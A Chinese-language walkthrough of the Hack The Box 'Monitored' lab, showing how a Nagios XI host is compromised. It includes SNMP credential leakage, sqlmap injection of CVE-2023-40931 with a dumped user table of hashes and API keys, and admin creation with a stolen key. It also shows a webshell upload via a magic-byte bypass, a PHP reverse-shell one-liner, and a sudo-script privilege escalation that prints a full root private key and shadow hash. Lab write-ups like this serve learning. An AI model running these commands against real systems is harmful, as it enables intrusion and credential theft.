扫描靶机
nmap -sC -sV -sU -T4 -Pn 10.10.11.248
除了扫描到了子域名,还扫描一下udp端口,省的fuzz了,将域名们都加入hosts
echo "10.10.11.248 nagios.monitored.htb monitored.htb" | sudo tee -a /etc/hosts有个ldap的端口使用ldapsearch扫描一下
ldapsearch -x -H ldap://monitored.htb -D '' -w '' -b "DC=monitored,DC=htb"
从上面的返回信息,返回了域 "monitored.htb" 的基本信息,包括它的可分辨名称、对象类和一些关键属性。查询成功完成,并且只返回了一个条目,没什么信息可以利用,刚刚有个udp的端口161,可以参考这篇文章使用snmapwalk工具
https://book.hacktricks.xyz/network-services-pentesting/pentesting-snmp
直接使用snmpwalk
snmpwalk -v2c -c public monitored.htbsvc XjH7VCehowpR1xZB
貌似挖到了一个用户,进入网页看看
从界面可以知道该系统是Nagios XI,这是企业级的网络监控和警报软件。它提供监控功能,能够监控网络服务(如SMTP、POP3、HTTP、NNTP)、主机资源(如处理器负载、磁盘使用情况)、服务器组件(如交换机、路由器等),尝试登录刚刚扫到用户
但是显示The specified user account has been disabled or does not exist.,意味着尝试访问的用户账户要么被禁用了,要么根本不存在,扫描一下目录
可以看到除了admin登录页面,还有一个api接口页面,去这个网址了解一下如何使用API进行身份验证,然后使用curl获得API
https://support.nagios.com/forum/ucp.php?mode=login&redirect=viewtopic.php%3Ff%3D58783&sid=b56c3aaf8e83bab9151b7e0492f231da
curl -POST -k 'https://nagios.monitored.htb/nagiosxi/api/v1/authenticate' -d 'username=svc&password=XjH7VCehowpR1xZB&valid_min=500'
获得了API接口,然后搜索,通过id参数在nagiosxi/admin/banner_message-ajaxhelper.php路径可以找到一个漏洞,对应的漏洞编码是CVE-2023-40931,该漏洞有个sql注入
使用sqlmap注入,将风险跟测试级别跳到最高,token是通过curl拿到的那个,Nagios XI 的管理员端点,可能存在 SQL 注入漏洞。
sqlmap -u "https://nagios.monitored.htb//nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=235199d999e2f7a689fb806fdb8f0bcd6144037b" --level 5 --risk 3 -p id
成功获得了信息然后继续注入,导出数据库,这次sqlmap嵌套一个curl命令,目的是用于从 Nagios XI 的 API 获取一个动态令牌,然后加入awk命令,它被用来从curl命令的输出中提取特定的信息
sqlmap -u "https://nagios.monitored.htb//nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=`curl -ksX POST https://nagios.monitored.htb/nagiosxi/api/v1/authenticate -d "username=svc&password=XjH7VCehowpR1xZB&valid_min=500" | awk -F'"' '{print$12}'`" --level 5 --risk 3 -p id --batch -D nagiosxi -T xi_users --dump
Database: nagiosxiTable: xi_users[17 entries]+---------+----------------------+------------------------+------------------------------------------------------------------+---------+--------------------------------------------------------------+--------------+------------+------------+-------------+-------------+--------------+--------------+------------------------------------------------------------------+----------------+----------------+----------------------+| user_id | name | email | api_key | enabled | password | username | created_by | last_login | api_enabled | last_edited | created_time | last_attempt | backend_ticket | last_edited_by | login_attempts | last_password_change |+---------+----------------------+------------------------+------------------------------------------------------------------+---------+--------------------------------------------------------------+--------------+------------+------------+-------------+-------------+--------------+--------------+------------------------------------------------------------------+----------------+----------------+----------------------+| 1 | Nagios Administrator | [email protected] | IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL | 1 | $2a$10$825c1eec29c150b118fe7unSfxq80cf7tHwC0J0BG2qZiNzWRUx2C | nagiosadmin | 0 | 1701931372 | 1 | 1701427555 | 0 | 1705259280 | IoAaeXNLvtDkH5PaGqV2XZ3vMZJLMDR0 | 5 | 4427 | 1701427555 || 2 | svc | [email protected] | 2huuT2u2QIPqFuJHnkPEEuibGJaJIcHCFDpDb29qSFVlbdO4HJkjfg2VpDNE3PEK | 0 | $2a$10$12edac88347093fcfd392Oun0w66aoRVCrKMPBydaUfgsgAOUHSbK | svc | 1 | 1699724476 | 1 | 1699728200 | 1699634403 | 1705257680 | 6oWBPbarHY4vejimmu3K8tpZBNrdHpDgdUEs5P2PFZYpXSuIdrRMYgk66A0cjNjq | 1 | 27 | 1699697433 || 6 | clevergod | clevergod@localhost | P5Bg5fhEAJ5nZRU6WrGtAjqjTv9tqhM8IVkrlGPvRQhMqprJq06uf0g2qA5KqlXl | 1 | $2a$10$36a6966416611e0791501uD7KJ289PsLTiT.QiAeMoeX9PP9T5mUC | clevergod | 0 | 1705241773 | 0 | 0 | 0 | 0 | umuh0vRnsk7glrjckIRouFUlSWNltZAhY6bALEZDrKEk4NoeAMdnEuTVU0jZfLXg | 0 | 0 | 1705241816 || 7 | soigan | soigan@localhost | OFBNBIFZmPTAoj4YO42FkJtG04JrboNATKtXmgQ4KgONRETAqj9pAUlKtspvtgOl | 1 | $2a$10$d382ff643308c0a5c3a4dOqNRmDonck748e/74OVTZCTEt.giww2y | soigan | 0 | 1705241754 | 0 | 0 | 0 | 0 | oDs4EP0PMmcE4dE2ElMdkEEm7Hgfo4O293go6IhJ3RSaMifXm5XKueQruH9plpF0 | 0 | 0 | 1705241775 || 8 | Okami | okami@localhost | croGGTlebCq4JTJRgKXIJEeeoIRAQfrID4qiKtmOg8jfOWOaaMYhqo5blik9d7Z9 | 1 | $2a$10$0a281e526fbf51e783152u.V1j6TfS6SmzLS95ACB1Om.2mBvAYva | okami2 | 0 | 1705241773 | 0 | 0 | 0 | 0 | XCG96OgC8fWDa5Qi64NCFuaFHtmFRs9faAVTqOHVkdLO2tZS2AcAWR9e8GXMXagZ | 0 | 0 | 1705241802 || 9 | Jordan McDouglas | jmcdouglas@localhost | C02pjiWAgjmoAhERBg3km7YPEBlpMfGYcVc9t6H9pcZhna02KXYDfp7IvKCftqmE | 1 | $2a$10$68609981a3eb3b26a1e43upveGl2Wl5AsZ9piZoRnz0igTFvQuz1a | bruh | 0 | 1705246996 | 0 | 0 | 0 | 0 | eqZPs9JUfQWn9KGHSIWDSdVP5hoEcsBUN2rE6nDNKlaunlcq4SEOfSgNDOhf0meJ | 0 | 0 | 1705242001 || 10 | myadmin | myadmin@localhost | fqZAK8CQLiPnk42GhsekmmBF64bJVRTE4XF2QkVClvv8XL4f8rUWFJCp72SmhJSC | 1 | $2a$10$fca486c711f019c91ac32usG6t8aPwOxmqMK8K.GWndd7CTmwZska | myadmin | 0 | 1705242879 | 0 | 0 | 0 | 1705248294 | EO7C697ZW4gJTT5vAI0iXEBmM6HBSLfkpLn7MERk3elt0rL62OX5ur0YZgngQZM0 | 0 | 2 | 1705242891 || 11 | trial | trial@localhost | neSUGurU7dYahC0dsadIksXB2gZ8UVKvBU3u2Dm8JViWZ0QI8TBcHEgqAIc3eYHL | 1 | $2a$10$909cef52236dd4b834b43O3u.aDO/VAqnEX4PG7L5mj33OeGMP9KS | trial | 0 | 1705245991 | 0 | 0 | 0 | 0 | f5Av5I9Hvbo8dR7hJYqYh997eoUd4g6CoPkhEGtBdGdWnsWDrK5QOqCBGQkV3OZn | 0 | 0 | 1705246010 || 12 | myadmin | myadmin@localhost | 47Ulg9kDGtG2JOBXrYaNHs00HQOIbdi7gPptD8SWiPcU7Ho9fSqN74IndtFgmUKT | 1 | $2a$10$beb6f8dd9299cbef879c5OZMwbNVaYrXnTlERMT8nU1Gqiv6Tw51C | daniel | 0 | 1705246281 | 0 | 0 | 0 | 0 | S2Mp3R58ZKFRuVL4bMVboo0VdRn5quBVlbXF9tXvkkMol0Hjh4WJ4ZAWUsgbafda | 0 | 0 | 1705246302 || 13 | caius | caius@localhost | kQR93oJTjhp8AtXOoegsZEtgAWAsXQc5Nb68CO4OdofXmaqaQmnWbDSYcrQHplVS | 1 | $2a$10$1ba4796435450f4de15e5uQgSbMoVWVZDdj/KWTtTDWn3qeD9etBG | caius | 0 | 1705248304 | 0 | 0 | 0 | 0 | jPKe7ANBhahFhmn7QAVcNqhfilbU0h6RCFrWiqKiBApemMtBrkYCLfbZuPjrdL2U | 0 | 0 | 1705246753 || 14 | r2alter | r2alter@localhost | 2KED2nU5DUBXoDclXDZdrTELYEYMYCE4J225X5JYbpPtpATBNvK0BMOVB3lZDOVQ | 1 | $2a$10$67761afbd5905b4c383ecON9oIMFHxGLcyscMrmS.ZrQkuSTsZCPi | r2alter | 0 | 1705249740 | 0 | 0 | 0 | 0 | oEk36LTabcGtF8JmBucviWj0jbElaOgqbTNX9C86qiaZsarcLgqeYfOR5eR5kT3V | 0 | 0 | 1705249757 || 15 | test1 | test1@localhost | TFBi9eRYsf7m4MED6MOYbnrkrjYaHLkdmErfj5uOrkv9qcnpvO7DsCJonDQKtcCi | 1 | $2a$10$19a8dc631e010f39c1d38O3lDM1uNrHJ8tXnY6nQGjvQBM2EyP4ZG | test1 | 0 | 1705250532 | 0 | 0 | 0 | 0 | 8nN4drjF4ASZc5MnuMu0S0FJGFg3BtmPea0k4VvN3sUq5Qvh0hd5fO4euVEXLBWi | 0 | 0 | 1705251004 || 16 | Admin111 | admin111@localhost | jXlXoglBRSuSc8iHlIcVK5MK0sa4KFc5FuOTV9t4dHhJN8sc3hofHf530P7vS20Z | 1 | $2a$10$4e8b342e14279e6f3fea0uy4W9Elgt1Jslxis8PsLabFhAVuyots2 | admin111001 | 0 | 0 | 0 | 0 | 0 | 0 | IWlP7jOemd64JFdlDBAf3YWSTZNBvatC0gI5TFP6LbHOZj4jL2eUCF0gMrgQlAAq | 0 | 0 | 1705255579 || 17 | admin18954 | nil@localhost | tRYnaCKdua0NqM0YTQ0aPe9h3RevXhgJbEWdQSCavmLbgNJtAPQmKld869mvCdQN | 1 | $2a$10$c9aa58a5aa9d200df0721uCygEWIIjJUOzcrrI56q8LI9/FDKBQeu | admin18954 | 0 | 0 | 0 | 0 | 0 | 0 | 2d7ZjXXa2lgZm3HYrIL3CkMgKuKP4Mv8VrrI3OdLgKF3pcC0W8SgjGggCBuiK7Nt | 0 | 0 | 1705255670 || 18 | nil | nil@localhost | jscF3TipNPvXlEcVQK68ZdO0FTvW2obEbX6hVbI2mYVMFANKFYJiOv8cA4Hs0P7S | 1 | $2a$10$11f2b396b7747d243406auW.cDbfyUIF40Z8bhbmqX7n8f4FFcOgi | admin17890 | 0 | 1705255762 | 0 | 0 | 0 | 0 | IPodeIqfqMnFaETD8fUIpIXQvJaAIHJettXYbmVEKdqjHO75X0AYS3R8IdMtCkEE | 0 | 0 | 1705255789 || 19 | usuarionuevo | usuarionuevo@localhost | FIivJrkONIn8G2IqlLPdmbKZVgTmfHjjSUdKXpFvgbVUMXSWIWt2UDocYIC4s7fV | 1 | $2a$10$f3934a82d87f410c069aaO2O9i1dKfPc1jJY1wCI6260btwyTq2Im | usuarionuevo | 0 | 1705258182 | 0 | 0 | 0 | 0 | AdkjufJVUhYRLDr5kn0fB0XKej4cTa85eHrNKiY5cdDNZAjLUjLOpXAQqjprk5Hl | 0 | 0 | 1705258157 || 20 | Admin111 | admin111@localhost | AdgPUWh5pLWr9ocRkgRYnkbk4uTtkkG6pQNXLrNZnaaveuYdrQXlbemFa6kv5VHr | 1 | $2a$10$5f550316a5b1eeef1eecauivvMVlRxmwIRsr1GTiRZrLN.QbldUIm | admin111 | 0 | 1705258032 | 0 | 0 | 0 | 0 | ZHOjDbOtA3tjL6C4c85EctnLKI7FtGihc7X54Tmv6EGNAhA3tFC426DK66dZG5fJ | 0 | 0 | 1705258040 |+---------+----------------------+------------------------+------------------------------------------------------------------+---------+--------------------------------------------------------------+--------------+------------+------------+-------------+-------------+--------------+--------------+------------------------------------------------------------------+----------------+----------------+----------------------+
在/root/.local/share/sqlmap/output/nagios.monitored.htb/dump/nagiosxi/xi_users.csv路径下可以拿到一个导出的文件,然后使用curl命令向 Nagios XI 的 API 发送 POST 请求,创建一个新的用户账户
curl -POST -k "https://nagios.monitored.htb/nagiosxi/api/v1/system/user?apikey=IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL&pretty=1" -d "username=caixukun&password=caixukun&name=caixukun&email=caixukun@monitored.htb&auth_level=admin
然后使用新建的账户登陆一下
然后写了需要写的东西找到Custom Includes目录,是一个上传的页面
经过测试该页面是可以通过图片格式绕过来进行getshell的,首先找到需要的php文件,再使用hexedit修改文件,加入JPEG图片识别编码幻数(magic number)分别是“FF D8 FF E0”
修改后保存,然后修改文件为jpg格式,再进行上传
可以看到上传成功了,然后先修改格式为php,修改完毕后预览
预览是不会直接现实php的,所以我们要修改格式
可以看到成功上传shell了,在下面的表单可以执行命令,直接反弹shel
php -r '$sock=fsockopen("10.10.14.67",443);exec("/bin/bash <&3 >&3 2>&3");'
因为www-data用户有着nagios用户的性质,可以直接拿到一个flag
直接输入sudo -l查看提权
www-data@monitored:/home/nagios$ sudo -lsudo -lMatching Defaults entries for www-data on localhost:env_reset, mail_badpass,secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binUser www-data may run the following commands on localhost:(root) NOPASSWD: /etc/init.d/snmptt restart(root) NOPASSWD: /usr/bin/tail -100 /var/log/messages(root) NOPASSWD: /usr/bin/tail -100 /var/log/httpd/error_log(root) NOPASSWD: /usr/bin/tail -100 /var/log/mysqld.log(root) NOPASSWD: /usr/bin/php/usr/local/nagiosxi/scripts/components/autodiscover_new.php *(root) NOPASSWD: /usr/local/nagiosxi/scripts/components/getprofile.sh(root) NOPASSWD: /usr/local/nagiosxi/scripts/repair_databases.sh(root) NOPASSWD: /usr/local/nagiosxi/scripts/manage_services.sh *www-data@monitored:/home/nagios$
先分析一下/usr/local/nagiosxi/scripts/components/getprofile.sh这个脚本,其中可看到这三条命令
echo "Creating nagios.txt..."nagios_log_file=$(cat /usr/local/nagios/etc/nagios.cfg | sed -n -e 's/^log_file=//p' | sed 's/r$//')tail -n500 "$nagios_log_file" &> "/usr/local/nagiosxi/var/components/profile/$folder/nagios-logs/nagios.txt"
该命令的意思是从 Nagios 配置文件中提取日志文件的路径,然后从该日志文件中提取最后 500 行的内容,并将这些内容保存到一个新文件中,然后我们查看一下/usr/local/nagios/etc/nagios.cfg的权限
是带有www-data权限,查看一下内容,可以修改log_file的位置,然后运行脚本,得出文本生成的东西
然后现在使用/usr/local/nagiosxi/scripts/components/getprofile.sh备份
sudo /usr/local/nagiosxi/scripts/components/getprofile.sh 1
进入到/usr/local/nagiosxi/var/components/profile-1705325192目录下,可以看到刚刚生成的日志
然后再次进入nagios-log里面找到nagios的文本拿到一个root的私钥,直接登陆
root-id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----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-----END OPENSSH PRIVATE KEY-----
成功拿到flag跟shadow
root:$y$j9T$LLy.W6CI0K6McgXMKio0i1$1omBVYjsg.8qEzyjkL.3kXtpAMZNc7x9CMwOnrwltJ8:19671:0:99999:7:::原文始发于微信公众号(Jiyou too beautiful):HTB-Monitored笔记
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论